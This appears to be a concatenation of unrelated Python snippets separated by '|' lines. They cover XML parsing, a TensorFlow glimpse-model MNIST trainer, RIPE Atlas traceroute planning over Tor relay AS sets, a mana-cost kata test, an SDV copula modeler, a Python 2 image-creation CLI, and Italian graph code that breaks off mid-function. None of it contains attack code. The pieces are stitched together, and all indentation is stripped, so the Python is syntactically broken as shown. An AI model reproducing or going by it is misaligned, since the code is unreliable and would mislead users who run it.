import xml.dom.minidom
DOMTree = xml.dom.minidom.parse("movies.xml") # open the XML file
collection = DOMTree.documentElement # get the document (root) element
movies = collection.getElementsByTagName("movie") # get all elements with this tag name; returns a list
print(movies[0].getAttribute("title"))
types = collection.getElementsByTagName("type")  # renamed to avoid shadowing the built-in `type`
item = types[0]
print(item.firstChild.data)
def getxmlvalue(nodename=None, file=None, n=0):
file = xml.dom.minidom.parse(file)
DOMTree = file.documentElement
itemlist = DOMTree.getElementsByTagName(nodename)
item = itemlist[n]
return item.firstChild.data
def getxmlattr(parentname=None, childname=None, file=None, n=0):
file = xml.dom.minidom.parse(file)
DOMTree = file.documentElement
itemlist = DOMTree.getElementsByTagName(parentname)
item = itemlist[n]
return item.getAttribute(childname)
print(getxmlvalue("type", "movies.xml"))
print(getxmlattr("type", "nick", "movies.xml"))
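# Illustrative input this snippet assumes (the real movies.xml is not shown).
# With a file like the one below, the calls above print the first movie's
# title, the text of the first <type> element, and its "nick" attribute:
#
# <collection>
#     <movie title="Enemy Behind">
#         <type nick="war">War, Thriller</type>
#     </movie>
# </collection>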
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: mnist_center.py
# Author: Qian Ge <geqian1001@gmail.com>
import sys
import numpy as np
import tensorflow as tf
import platform
import scipy.misc
import argparse
sys.path.append('../')
from lib.dataflow.mnist import MNISTData
from lib.model.ram import RAMClassification
from lib.helper.trainer import Trainer
DATA_PATH = '/home/qge2/workspace/data/MNIST_data/'
SAVE_PATH = '/home/qge2/workspace/data/out/ram/'
RESULT_PATH = '/home/qge2/workspace/data/out/ram/'
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--predict', action='store_true',
help='Run prediction')
parser.add_argument('--train', action='store_true',
help='Train the model')
parser.add_argument('--test', action='store_true',
help='Test')
parser.add_argument('--trans', action='store_true',
help='Transform image')
parser.add_argument('--center', action='store_true',
help='Center')
parser.add_argument('--step', type=int, default=1,
help='Number of glimpses')
parser.add_argument('--sample', type=int, default=1,
help='Number of location samples during training')
parser.add_argument('--glimpse', type=int, default=12,
help='Glimpse base size')
parser.add_argument('--batch', type=int, default=128,
help='Batch size')
parser.add_argument('--epoch', type=int, default=1000,
help='Max number of epoch')
parser.add_argument('--load', type=int, default=100,
help='Load pretrained parameters with id')
parser.add_argument('--lr', type=float, default=1e-3,
help='Init learning rate')
parser.add_argument('--std', type=float, default=0.11,
help='std of location')
parser.add_argument('--pixel', type=int, default=26,
help='unit_pixel')
parser.add_argument('--scale', type=int, default=3,
help='scale of glimpse')
return parser.parse_args()
class config_center():
step = 6
sample = 1
glimpse = 8
n_scales = 1
batch = 128
epoch = 1000
loc_std = 0.03
unit_pixel = 12
class config_transform():
step = 6
sample = 1
glimpse = 12
n_scales = 3
batch = 128
epoch = 2000
loc_std = 0.03
unit_pixel = 26
if __name__ == '__main__':
FLAGS = get_args()
if FLAGS.trans:
name = 'trans'
config = config_transform()
elif FLAGS.center:
name = 'centered'
config = config_center()
else:
FLAGS.trans = True
name = 'custom'
class config_FLAGS():
step = FLAGS.step
sample = FLAGS.sample
glimpse = FLAGS.glimpse
n_scales = FLAGS.scale
batch = FLAGS.batch
epoch = FLAGS.epoch
loc_std = FLAGS.std
unit_pixel = FLAGS.pixel
config = config_FLAGS()
train_data = MNISTData('train', data_dir=DATA_PATH, shuffle=True)
train_data.setup(epoch_val=0, batch_size=config.batch)
valid_data = MNISTData('val', data_dir=DATA_PATH, shuffle=True)
valid_data.setup(epoch_val=0, batch_size=10)
model = RAMClassification(
im_channel=1,
glimpse_base_size=config.glimpse,
n_glimpse_scale=config.n_scales,
n_loc_sample=config.sample,
n_step=config.step,
n_class=10,
max_grad_norm=5.0,
unit_pixel=config.unit_pixel,
loc_std=config.loc_std,
is_transform=FLAGS.trans)
model.create_model()
trainer = Trainer(model, train_data, init_lr=FLAGS.lr)
writer = tf.summary.FileWriter(SAVE_PATH)
saver = tf.train.Saver()
sessconfig = tf.ConfigProto()
sessconfig.gpu_options.allow_growth = True
with tf.Session(config=sessconfig) as sess:
sess.run(tf.global_variables_initializer())
if FLAGS.train:
writer.add_graph(sess.graph)
for step in range(0, config.epoch):
trainer.train_epoch(sess, summary_writer=writer)
trainer.valid_epoch(sess, valid_data, config.batch)
saver.save(sess,
'{}ram-{}-mnist-step-{}'
.format(SAVE_PATH, name, config.step),
global_step=step)
writer.close()
if FLAGS.predict:
valid_data.setup(epoch_val=0, batch_size=20)
saver.restore(sess,
'{}ram-{}-mnist-step-6-{}'
.format(SAVE_PATH, name, FLAGS.load))
batch_data = valid_data.next_batch_dict()
trainer.test_batch(
sess,
batch_data,
unit_pixel=config.unit_pixel,
size=config.glimpse,
scale=config.n_scales,
save_path=RESULT_PATH)
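# Illustrative invocations (the flags are the ones defined in get_args() above):
#   python mnist_center.py --train --center
#   python mnist_center.py --predict --trans --load 100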
|
import json
import logging
from datetime import datetime
import os
from ipaddress import ip_address
MAX_ELEMENTS_PER_CASE = 1000
CHUNK_SIZE = 30 # Because 100 is the limit, and some do not finish, 30 are for sure free
COST_PER_TRACEROUTE = 20 # Because OneOff = True
def template_measurement():
return {
"definitions": [],
"probes": [],
"is_oneoff": True
}
def template_definition(ip_version="ipv4"):
return {
"target": "TARGET",
"description": "DESCRIPTION",
"type": "traceroute",
"af": 6 if ip_version == "ipv6" else 4,
"is_public": True,
"protocol": "ICMP",
"response_timeout": 20000,
"is_oneoff": True,
"packets": 1 # Just use one packet to have less costs
}
def template_probe_list():
return {
"requested": 1,
"type": "probes",
"value": "PROBESLIST" # Enter Probes here
}
def template_probe_asn():
return {
"requested": 1,
"type": "asn",
"value": "ASN" # Enter Probes here
}
def chunks(lst, n):
for i in range(0, len(lst), n):
yield lst[i:i + n]
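# e.g. list(chunks([1, 2, 3, 4, 5], 2)) -> [[1, 2], [3, 4], [5]]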
def create_one_to_many(measurement_name, endpoint_set, relay_set, ip_version="ipv4"):
relay_set_items = list(relay_set.items())[:MAX_ELEMENTS_PER_CASE]
measurement_list = []
for chunked_relay_set_items in chunks(relay_set_items, CHUNK_SIZE):
measurement = template_measurement()
for asn, o in chunked_relay_set_items:
ip, separator, port = o["relays"][0]["or_addresses"].rpartition(':')
definition = template_definition(ip_version)
definition["target"] = ip.strip("[]") #strip brackets for ipv6
if port and port != "0":
definition["port"] = int(port)
definition["description"] = measurement_name
measurement["definitions"].append(definition)
probe = template_probe_list()
probe["requested"] = len(endpoint_set["probes"])
probe["value"] = ",".join(map(str, endpoint_set["probes"]))
measurement["probes"].append(probe)
measurement_list.append(measurement)
return measurement_list
def create_many_to_one(measurement_name, probe_set, endpoint_set, ip_version="ipv4"):
measurement = template_measurement()
for addrs in endpoint_set["addresses"]:
target_addrs_v4 = [addr for addr in addrs if "[" not in addr]
target_addrs_v6 = [addr for addr in addrs if "[" in addr]
target_addrs = target_addrs_v6 if ip_version == "ipv6" else target_addrs_v4
if len(target_addrs) == 0:
logging.warning(f'No target addresses found!')
continue
addr = target_addrs[0]
ip, separator, port = addr.rpartition(':')
definition = template_definition(ip_version)
definition["target"] = ip.strip("[]")
if port and port != "0":
definition["port"] = int(port)
definition["description"] = measurement_name
measurement["definitions"].append(definition)
for asn, o in probe_set.items():
probe = template_probe_asn()
probe["requested"] = 1 # Only use one probe of each AS
probe["value"] = int(asn[2:])
measurement["probes"].append(probe)
return [measurement]
def create_case1(measurement_name, c_as, g_as, ip_version="ipv4"):
return create_one_to_many(measurement_name + "-c1", c_as, g_as, ip_version)
def create_case2(measurement_name, e_as_r, d_as, ip_version="ipv4"):
return create_many_to_one(measurement_name + "-c2", e_as_r, d_as, ip_version)
def create_case3(measurement_name, d_as, e_as, ip_version="ipv4"):
return create_one_to_many(measurement_name + "-c3", d_as, e_as, ip_version)
def create_case4(measurement_name, g_as_r, c_as, ip_version="ipv4"):
return create_many_to_one(measurement_name + "-c4", g_as_r, c_as, ip_version)
def calculate_costs_for_measurement_set(measurement_set):
"""Calculate the costs of RIPE Atlas credits for the complete measurement based on the measurement set"""
ms = measurement_set
case1 = COST_PER_TRACEROUTE * len(ms["c_as"]) * len(ms["g_as"])
case2 = COST_PER_TRACEROUTE * len(ms["e_as_r"]) * len(ms["d_as"])
case3 = COST_PER_TRACEROUTE * len(ms["d_as"]) * len(ms["e_as"])
case4 = COST_PER_TRACEROUTE * len(ms["g_as_r"]) * len(ms["c_as"])
total = case1 + case2 + case3 + case4
return case1, case2, case3, case4, total
def calculate_costs_for_definition(definition):
"""
Calculate the cost of one RIPE Atlas measurement definition
This is not perfect, just: 20 * nr_definitions * requested_probes (so no packets, ...)
"""
return 20 * len(definition["definitions"]) * sum([p["requested"] for p in definition["probes"]])
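# Illustrative example (not from the original source): a measurement with
# 3 definitions and probe blocks requesting 5 + 5 probes would be estimated
# at 20 * 3 * (5 + 5) = 600 credits.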
def calculate_number_of_measurements(definition):
return len(definition["definitions"])
def main():
# TODO ADOPT MAIN
measurement_name = datetime.now().strftime("%Y%m%d-%H%M%S")
measurement_dir = 'ripe-measurements/' + measurement_name + "/"
os.mkdir(measurement_dir)
c_probe = [26895] # My Client
d_ip = ["1.2.3.4:80"] # Destination IP # TODO Freitag 20/12
d_probe = [12345] # TODO Freitag 20/12
c_ip = ["23.12.12.12:80"] # TODO Freitag 20/12
g_as_fp = open("run/20191221-1422/measurement-sets/g_as.json")
e_as_fp = open("run/20191221-1422/measurement-sets/e_as.json")
g_as_r_fp = open("run/20191221-1422/measurement-sets/g_as_r.json")
e_as_r_fp = open("run/20191221-1422/measurement-sets/e_as_r.json")
g_as = json.load(g_as_fp)
e_as = json.load(e_as_fp)
g_as_r = json.load(g_as_r_fp)
e_as_r = json.load(e_as_r_fp)
with open(measurement_dir+"case1.json", "w") as case4_fp:
json.dump(create_case1(measurement_name, c_probe, g_as), fp=case4_fp, indent=2)
with open(measurement_dir+"case2.json", "w") as case2_fp:
json.dump(create_case2(measurement_name, e_as_r, d_ip), fp=case2_fp, indent=2)
with open(measurement_dir+"case3.json", "w") as case3_fp:
json.dump(create_case3(measurement_name, d_probe, e_as), fp=case3_fp, indent=2)
with open(measurement_dir+"case4.json", "w") as case4_fp:
json.dump(create_case4(measurement_name, g_as_r, c_ip), fp=case4_fp, indent=2)
g_as_fp.close()
e_as_fp.close()
g_as_r_fp.close()
e_as_r_fp.close()
if __name__ == '__main__':
main()
def create_probes_set(probes, ip_version="ipv4"):
probes_per_as_v4 = dict()
probes_per_as_v6 = dict()
for p in probes["objects"]:
if p["status_name"] == "Connected":
as_ipv4 = f"AS{p['asn_v4']}"
as_ipv6 = f"AS{p['asn_v6']}"
if p["asn_v4"]:  # the f-string above is always truthy, so test the raw ASN field
    probes_per_as_v4.setdefault(as_ipv4, []).append(p["id"])
if p["asn_v6"]:
    probes_per_as_v6.setdefault(as_ipv6, []).append(p["id"])
return probes_per_as_v6 if ip_version == "ipv6" else probes_per_as_v4
def create_guard_set(details, ip_version):
"""Create (ii) g-as."""
return create_simple_set(details, "Guard", ip_version)
def create_exit_set(details, ip_version):
"""Create (iv) e-as."""
return create_simple_set(details, "Exit", ip_version)
def create_simple_set(details, filtr, ip_version="ipv4"):
relay_per_as_v4 = {}
relay_per_as_v6 = {}
for r in details["relays"]:
if filtr in r["flags"]:
if "as" in r:
r_addrs = r["or_addresses"]
# remove brackets at ipv6 addrs since we parse them anyway
#r_addrs = [addr.strip("[]") for addr in r_addrs]
#ipv4_addrs = [addr for addr in r_addrs if ip_address(addr).version == 4]
#ipv6_addrs = [addr for addr in r_addrs if ip_address(addr).version == 6]
ipv4_addrs = [addr for addr in r_addrs if not "[" in addr]
ipv6_addrs = [addr for addr in r_addrs if "[" in addr]
if ipv4_addrs:
relay_per_as_v4.setdefault(str(r["as"]), {"relays": []})["relays"].append({"fingerprint": r["fingerprint"],
"or_addresses":
ipv4_addrs[0]})
if ipv6_addrs:
relay_per_as_v6.setdefault(str(r["as"]), {"relays": []})["relays"].append({"fingerprint": r["fingerprint"],
"or_addresses":
ipv6_addrs[0]})
return relay_per_as_v6 if ip_version == "ipv6" else relay_per_as_v4
def create_guard_with_ripe_probes_set(details, probes, ip_version):
"""Create (iii) g-as-r."""
return create_set_with_ripe_probes(details, probes, "Guard", ip_version)
def create_exit_with_ripe_probes_set(details, probes, ip_version):
"""Create (v) e-as-r."""
return create_set_with_ripe_probes(details, probes, "Exit", ip_version)
def create_set_with_ripe_probes(details, probes, filtr, ip_version):
relay_per_as = create_simple_set(details, filtr, ip_version)
probes = create_probes_set(probes, ip_version)
as_to_delete = []
for asn in relay_per_as.keys():
if asn in probes:
relay_per_as[asn]["ids"] = probes[asn]
else:
as_to_delete.append(asn)
for asn in as_to_delete:
del relay_per_as[asn]
return relay_per_as
|
nmList=[8,60,43,55,25,134,1]
total=0
for i in nmList:
total+=i
print(total)
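# Equivalent one-liner using the built-in (prints the same total, 326):
# print(sum(nmList))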
|
import unittest
from katas.kyu_6.regexp_basics_parsing_mana_cost import parse_mana_cost
class ParseManaCostTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(parse_mana_cost(''), {})
def test_equals_2(self):
self.assertEqual(parse_mana_cost('0'), {})
def test_equals_3(self):
self.assertEqual(parse_mana_cost('1'), {'*': 1})
def test_equals_4(self):
self.assertEqual(parse_mana_cost('4'), {'*': 4})
def test_equals_5(self):
self.assertEqual(parse_mana_cost('15'), {'*': 15})
def test_equals_6(self):
self.assertEqual(parse_mana_cost('2rr'), {'*': 2, 'r': 2})
def test_equals_7(self):
self.assertEqual(parse_mana_cost('1wbg'),
{'*': 1, 'w': 1, 'b': 1, 'g': 1})
def test_equals_8(self):
self.assertEqual(parse_mana_cost('1WWU'), {'*': 1, 'w': 2, 'u': 1})
def test_equals_9(self):
self.assertEqual(parse_mana_cost('0r'), {'r': 1})
def test_equals_10(self):
self.assertEqual(parse_mana_cost('2R'), {'*': 2, 'r': 1})
def test_equals_11(self):
self.assertEqual(parse_mana_cost('b'), {'b': 1})
def test_none(self):
self.assertIsNone(parse_mana_cost('2x'))
def test_none_2(self):
self.assertIsNone(parse_mana_cost('2\n'))
def test_none_3(self):
self.assertIsNone(parse_mana_cost('\n2'))
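# The module under test is not included in this snippet.  A minimal sketch
# that satisfies the assertions above might look like the following (an
# assumption, not the original katas implementation; kept commented out so the
# imported function is still the one exercised by the tests):
#
# import re
# from collections import Counter
#
# def parse_mana_cost(cost):
#     # optional generic-mana number followed by any run of colour letters
#     match = re.fullmatch(r'(\d*)([wubrgWUBRG]*)', cost)
#     if match is None:
#         return None          # anything else (e.g. '2x', '2\n') is invalid
#     generic, colours = match.groups()
#     result = Counter(colours.lower())
#     if generic and int(generic) > 0:
#         result['*'] = int(generic)
#     return dict(result)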
|
import logging
import pickle
import numpy as np
import pandas as pd
from copulas import EPSILON, get_qualified_name
from copulas.multivariate import GaussianMultivariate, TreeTypes
from copulas.univariate import GaussianUnivariate
from rdt.transformers.positive_number import PositiveNumberTransformer
# Configure logger
logger = logging.getLogger(__name__)
DEFAULT_MODEL = GaussianMultivariate
DEFAULT_DISTRIBUTION = GaussianUnivariate
IGNORED_DICT_KEYS = ['fitted', 'distribution', 'type']
MODELLING_ERROR_MESSAGE = (
'There was an error while trying to model the database. If you are using a custom '
'distribution or model, please try again using the default ones. If the problem persist, '
'please report it here:\nhttps://github.com/HDI-Project/SDV/issues.\n'
)
class Modeler:
"""Class responsible for modeling database.
Args:
data_navigator (DataNavigator): object for the dataset.
model (type): Class of model to use.
distribution (type): Class of distribution to use. Will be deprecated shortly.
model_kwargs (dict): Keyword arguments to pass to model.
"""
DEFAULT_PRIMARY_KEY = 'GENERATED_PRIMARY_KEY'
def __init__(self, data_navigator, model=DEFAULT_MODEL, distribution=None, model_kwargs=None):
"""Instantiates a modeler object."""
self.tables = {}
self.models = {}
self.child_locs = {} # maps table->{child: col #}
self.dn = data_navigator
self.model = model
if distribution and model != DEFAULT_MODEL:
raise ValueError(
'`distribution` argument is only supported for `GaussianMultivariate` model.')
if distribution is not None:
distribution = get_qualified_name(distribution)
else:
distribution = get_qualified_name(DEFAULT_DISTRIBUTION)
if not model_kwargs:
if model == DEFAULT_MODEL:
model_kwargs = {'distribution': distribution}
else:
model_kwargs = {'vine_type': TreeTypes.REGULAR}
self.model_kwargs = model_kwargs
def save(self, file_name):
"""Saves model to file destination.
Args:
file_name (string): path to store file
"""
with open(file_name, 'wb') as output:
pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)
@classmethod
def load(cls, file_name):
"""Load model from filename.
Args:
file_name (string): path of file to load
"""
with open(file_name, 'rb') as input:
return pickle.load(input)
def get_pk_value(self, pk, index, mapping):
if pk == self.DEFAULT_PRIMARY_KEY:
val = pk + str(index)
else:
val = mapping[pk]
return val
@classmethod
def _flatten_array(cls, nested, prefix=''):
"""Return a dictionary with the values of the given nested array.
Args:
nested (list, np.array): Iterable to flatten.
prefix (str): Name to append to the array indices.
Returns:
dict
"""
result = {}
for index in range(len(nested)):
prefix_key = '__'.join([prefix, str(index)]) if len(prefix) else str(index)
if isinstance(nested[index], (list, np.ndarray)):
result.update(cls._flatten_array(nested[index], prefix=prefix_key))
else:
result[prefix_key] = nested[index]
return result
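# Example (illustrative): cls._flatten_array([1, [2, 3]], prefix='a')
# returns {'a__0': 1, 'a__1__0': 2, 'a__1__1': 3}.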
@classmethod
def _flatten_dict(cls, nested, prefix=''):
"""Return a flatten dict from a nested one.
This method returns a flatten version of a dictionary, concatenating key names with
double underscores, that is:
Args:
nested (dict): Original dictionary to flatten.
prefix (str): Prefix to append to key name
Returns:
dict: Flattened dictionary. That is, all its keys hold a primitive value.
"""
result = {}
for key, value in nested.items():
prefix_key = '__'.join([prefix, str(key)]) if len(prefix) else key
if key in IGNORED_DICT_KEYS and not isinstance(value, (dict, list)):
continue
elif isinstance(value, dict):
result.update(cls._flatten_dict(value, prefix_key))
elif isinstance(value, (np.ndarray, list)):
result.update(cls._flatten_array(value, prefix_key))
else:
result[prefix_key] = value
return result
def _get_model_dict(self, data):
"""Fit and serialize a model and flatten its parameters into an array.
Args:
data(pandas.DataFrame): Dataset to fit the model to.
Returns:
dict: Flattened parameters for model.
"""
model = self.fit_model(data)
if self.model == DEFAULT_MODEL:
values = []
triangle = np.tril(model.covariance)
for index, row in enumerate(triangle.tolist()):
values.append(row[:index + 1])
model.covariance = np.array(values)
if self.model_kwargs['distribution'] == get_qualified_name(DEFAULT_DISTRIBUTION):
transformer = PositiveNumberTransformer({
'name': 'field',
'type': 'number'
})
for distribution in model.distribs.values():
column = pd.DataFrame({'field': [distribution.std]})
distribution.std = transformer.reverse_transform(column).loc[0, 'field']
return self._flatten_dict(model.to_dict())
def get_foreign_key(self, fields, primary):
"""Get foreign key from primary key.
Args:
fields (dict): metadata `fields` key for a given table.
primary (str): Name of primary key in original table.
Return:
str: Name of foreign key in current table.
"""
for field_key in fields:
field = fields[field_key]
ref = field.get('ref')
if ref and ref['field'] == primary:
foreign = field['name']
return foreign
@staticmethod
def impute_table(table):
"""Fill in any NaN values in a table.
Args:
table(pandas.DataFrame): Table to fill NaN values
Returns:
pandas.DataFrame
"""
values = {}
for column in table.loc[:, table.isnull().any()].columns:
if table[column].dtype in [np.float64, np.int64]:
value = table[column].mean()
if not pd.isnull(value or np.nan):
values[column] = value
else:
values[column] = 0
table = table.fillna(values)
# There is an issue when using KDEUnivariate modeler in tables with childs
# As the extension columns would have constant values, that make it crash
# This is a temporary fix while https://github.com/DAI-Lab/Copulas/issues/82 is solved.
first_index = table.index[0]
constant_columns = table.loc[:, (table == table.loc[first_index]).all()].columns
for column in constant_columns:
table.loc[first_index, column] = table.loc[first_index, column] + EPSILON
return table
def fit_model(self, data):
"""Returns an instance of self.model fitted with the given data.
Args:
data (pandas.DataFrame): Data to train the model with.
Returns:
model: Instance of self.model fitted with data.
"""
model = self.model(**self.model_kwargs)
model.fit(data)
return model
def _create_extension(self, foreign, transformed_child_table, table_info):
"""Return the flattened model from a dataframe.
Args:
foreign(pandas.DataFrame): Object with Index of elements from children table elements
of a given foreign_key.
transformed_child_table(pandas.DataFrame): Table of data to fit.
table_info (tuple[str, str]): foreign_key and child table names.
Returns:
pd.Series or None: Parameter extension if it can be generated, None otherwise.
"""
foreign_key, child_name = table_info
try:
child_rows = transformed_child_table.loc[foreign.index].copy()
if foreign_key in child_rows:
child_rows = child_rows.drop(foreign_key, axis=1)
except KeyError:
return None
num_child_rows = len(child_rows)
if num_child_rows:
clean_df = self.impute_table(child_rows)
extension = self._get_model_dict(clean_df)
extension['child_rows'] = num_child_rows
extension = pd.Series(extension)
extension.index = child_name + '__' + extension.index
return extension
return None
def _get_extensions(self, pk, children):
"""Generate list of extension for child tables.
Args:
pk (str): Name of the primary_key column in the parent table.
children (set[str]): Names of the children.
Returns: list(pandas.DataFrame)
Each element of the list is generated for a single child.
That dataframe should have the `foreign_key` name as its index name, and the
foreign key values as its index.
The values for a given index is generated by flattening a model fit with the related
data to that index in the children table.
"""
extensions = []
# find children that ref primary key
for child in children:
child_table = self.dn.tables[child].data
child_meta = self.dn.tables[child].meta
fields = child_meta['fields']
fk = self.get_foreign_key(fields, pk)
if not fk:
continue
# check if leaf node
if not self.dn.get_children(child):
transformed_child_table = self.dn.transformed_data[child]
else:
transformed_child_table = self.tables[child]
table_info = (fk, '__' + child)
foreign_key_values = child_table[fk].unique()
parameters = {}
for foreign_key in foreign_key_values:
foreign_index = child_table[child_table[fk] == foreign_key]
parameter = self._create_extension(
foreign_index, transformed_child_table, table_info)
if parameter is not None:
parameters[foreign_key] = parameter.to_dict()
extension = pd.DataFrame(parameters).T
extension.index.name = pk
if len(extension):
extensions.append(extension)
return extensions
def CPA(self, table):
"""Run CPA algorithm on a table.
Conditional Parameter Aggregation. It will take the table's children and generate
extensions (parameters from modelling the related children for each foreign key)
and merge them to the original `table`.
After the extensions are created, `extended_table` is modified in order for the extensions
to be merged. As the extensions are returned with an index consisting of values of the
`primary_key` of the parent table, we need to make sure that those same values are present in
`extended_table`. The values might not be present in two situations:
- They weren't numeric, and have been transformed.
- They weren't transformed, and therefore are not present on `extended_table`
Args:
table (string): name of table.
Returns:
None
"""
logger.info('Modeling %s', table)
# Grab table
tables = self.dn.tables
# grab table from self.tables if it is not a leaf
# o.w. grab from data
children = self.dn.get_children(table)
table_meta = tables[table].meta
# get primary key
pk = table_meta.get('primary_key', self.DEFAULT_PRIMARY_KEY)
# start with transformed table
extended_table = self.dn.transformed_data[table]
extensions = self._get_extensions(pk, children)
if extensions:
original_pk = tables[table].data[pk]
transformed_pk = None
if pk in extended_table:
transformed_pk = extended_table[pk].copy()
if (pk not in extended_table) or (not extended_table[pk].equals(original_pk)):
extended_table[pk] = original_pk
# add extensions
for extension in extensions:
extended_table = extended_table.merge(extension.reset_index(), how='left', on=pk)
if transformed_pk is not None:
extended_table[pk] = transformed_pk
else:
extended_table = extended_table.drop(pk, axis=1)
self.tables[table] = extended_table
def RCPA(self, table):
"""Recursively calls CPA starting at table.
Args:
table (string): name of table to start from.
"""
children = self.dn.get_children(table)
for child in children:
self.RCPA(child)
self.CPA(table)
def model_database(self):
"""Use RCPA and store model for database."""
for table in self.dn.tables:
if not self.dn.get_parents(table):
self.RCPA(table)
for table in self.tables:
clean_table = self.impute_table(self.tables[table])
self.models[table] = self.fit_model(clean_table)
logger.info('Modeling Complete')
|
#!/usr/bin/env python
#
# Copyright (c) 2011 Intel, Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import os, sys, errno
from mic import msger, creator
from mic.utils import cmdln, misc, errors
from mic.conf import configmgr
from mic.plugin import pluginmgr
from mic.__version__ import VERSION
class MicCmd(cmdln.Cmdln):
"""
Usage: mic SUBCOMMAND [OPTS] [ARGS...]
mic Means the Image Creation tool
Try 'mic help SUBCOMMAND' for help on a specific subcommand.
${command_list}
global ${option_list}
${help_list}
"""
name = 'mic'
version = VERSION
def print_version(self):
msger.raw("%s %s (%s)" % (self.name,
self.version,
misc.get_distro_str()))
def get_optparser(self):
optparser = cmdln.CmdlnOptionParser(self, version=self.version)
# hook optparse print_version here
optparser.print_version = self.print_version
optparser.add_option('-d', '--debug', action='store_true',
dest='debug',
help='print debug message')
optparser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='verbose information')
return optparser
def postoptparse(self):
if self.options.verbose:
msger.set_loglevel('verbose')
if self.options.debug:
try:
import rpm
rpm.setVerbosity(rpm.RPMLOG_NOTICE)
except ImportError:
pass
msger.set_loglevel('debug')
self.print_version()
def help_create(self):
cr = creator.Creator()
cr.optparser = cr.get_optparser()
doc = cr.__doc__
doc = cr._help_reindent(doc)
doc = cr._help_preprocess(doc, None)
doc = doc.replace(cr.name, "${cmd_name}", 1)
doc = doc.rstrip() + '\n'
return doc
@cmdln.alias("cr")
def do_create(self, argv):
try:
cr = creator.Creator()
cr.main(argv[1:])
except:
raise
def _root_confirm(self):
if os.geteuid() != 0:
msger.error('Root permission is required to continue, abort')
@cmdln.alias("cv")
@cmdln.option("-S", "--shell",
action="store_true", dest="shell", default=False,
help="Launch shell before packaging the converted image")
def do_convert(self, subcmd, opts, *args):
"""${cmd_name}: convert image format
Usage:
mic convert <imagefile> <destformat>
${cmd_option_list}
"""
if not args:
# print help
handler = self._get_cmd_handler('convert')
if hasattr(handler, "optparser"):
handler.optparser.print_help()
return 1
if len(args) == 1:
raise errors.Usage("It need 2 arguments (1 given)")
elif len(args) == 2:
(srcimg, destformat) = args
else:
raise errors.Usage("Extra argument given")
if not os.path.exists(srcimg):
raise errors.CreatorError("Cannot find the image: %s" % srcimg)
self._root_confirm()
configmgr.convert['shell'] = opts.shell
srcformat = misc.get_image_type(srcimg)
if srcformat == "ext3fsimg":
srcformat = "loop"
srcimager = None
destimager = None
for iname, icls in pluginmgr.get_plugins('imager').iteritems():
if iname == srcformat and hasattr(icls, "do_unpack"):
srcimager = icls
if iname == destformat and hasattr(icls, "do_pack"):
destimager = icls
if srcimager is None or destimager is None:
raise errors.CreatorError("Can't convert from %s to %s" \
% (srcformat, destformat))
else:
maptab = {
"livecd": "iso",
"liveusb": "usbimg",
"loop": "img",
}
if destformat in maptab:
imgname = os.path.splitext(os.path.basename(srcimg))[0]
dstname = "{0}.{1}".format(imgname, maptab[destformat])
if os.path.exists(dstname):
if msger.ask("Converted image %s seems existed, "
"remove and continue?" % dstname):
os.unlink(dstname)
else:
raise errors.Abort("Canceled")
base_on = srcimager.do_unpack(srcimg)
destimager.do_pack(base_on)
@cmdln.alias("ch")
@cmdln.option('-s', '--saveto',
action='store', dest='saveto', default=None,
help="Save the unpacked image to specified dir")
def do_chroot(self, subcmd, opts, *args):
"""${cmd_name}: chroot into an image
Usage:
mic chroot <imagefile>
${cmd_option_list}
"""
if not args:
# print help
handler = self._get_cmd_handler('chroot')
if hasattr(handler, "optparser"):
handler.optparser.print_help()
return 1
if len(args) == 1:
targetimage = args[0]
else:
raise errors.Usage("Extra argument given")
if not os.path.exists(targetimage):
raise errors.CreatorError("Cannot find the image: %s"
% targetimage)
self._root_confirm()
configmgr.chroot['saveto'] = opts.saveto
imagetype = misc.get_image_type(targetimage)
if imagetype in ("ext3fsimg", "ext4fsimg", "btrfsimg"):
imagetype = "loop"
chrootclass = None
for pname, pcls in pluginmgr.get_plugins('imager').iteritems():
if pname == imagetype and hasattr(pcls, "do_chroot"):
chrootclass = pcls
break
if not chrootclass:
raise errors.CreatorError("Cannot support image type: %s" \
% imagetype)
chrootclass.do_chroot(targetimage)
if __name__ == "__main__":
try:
mic = MicCmd()
sys.exit(mic.main())
except KeyboardInterrupt:
msger.error('\n^C caught, program aborted.')
# catch 'no space left' exception, etc
except IOError, e:
if e.errno == errno.ENOSPC:
msger.error('\nNo space left on device')
raise
except errors.Usage, usage:
msger.error(str(usage))
except errors.Abort, msg:
msger.info(str(msg))
except errors.CreatorError, err:
if msger.get_loglevel() == 'debug':
import traceback
msger.error(traceback.format_exc())
else:
msger.error('\n'+str(err))
|
from math import inf
from collections import deque
def bfs(nodo, grafo):
padri = [-1 for _ in grafo]
padri[nodo] = nodo
distanze = [inf for _ in grafo]
distanze[nodo] = 0
coda = deque([nodo])
while coda:
nodo = coda.popleft()  # FIFO order is required for correct BFS distances
for adiacente in grafo[nodo]:
if padri[adiacente] == -1:
distanze[adiacente] = distanze[nodo] + 1
padri[adiacente] = nodo
coda.append(adiacente)
return padri, distanze
def diametro_una_dfs(grafo):
# CONNECTED, UNDIRECTED, ACYCLIC GRAPH (A TREE)
def dfs(nodo):
profondita_max_1 = 0
profondita_max_2 = 0
diametro_max = 0
for adiacente in grafo[nodo]:
# Since there are no cycles, only the parent has to be excluded.
if not visitati[adiacente]:
visitati[adiacente] = True
profondita_max_adj, diametro_adj = dfs(adiacente)
if profondita_max_adj > profondita_max_1:
profondita_max_2 = profondita_max_1
profondita_max_1 = profondita_max_adj
elif profondita_max_adj > profondita_max_2:
profondita_max_2 = profondita_max_adj
if diametro_adj > diametro_max:
diametro_max = diametro_adj
# The +1 counts the current node itself.
diametro_max = max(profondita_max_1 + profondita_max_2 + 1,
diametro_max)
# The +1 counts the current node itself.
return (profondita_max_1 + 1, diametro_max)
visitati = [False for _ in grafo]
visitati[0] = True
return dfs(0)
def diametro_due_bfs(grafo):
# CONNECTED, UNDIRECTED GRAPH!
# Steps:
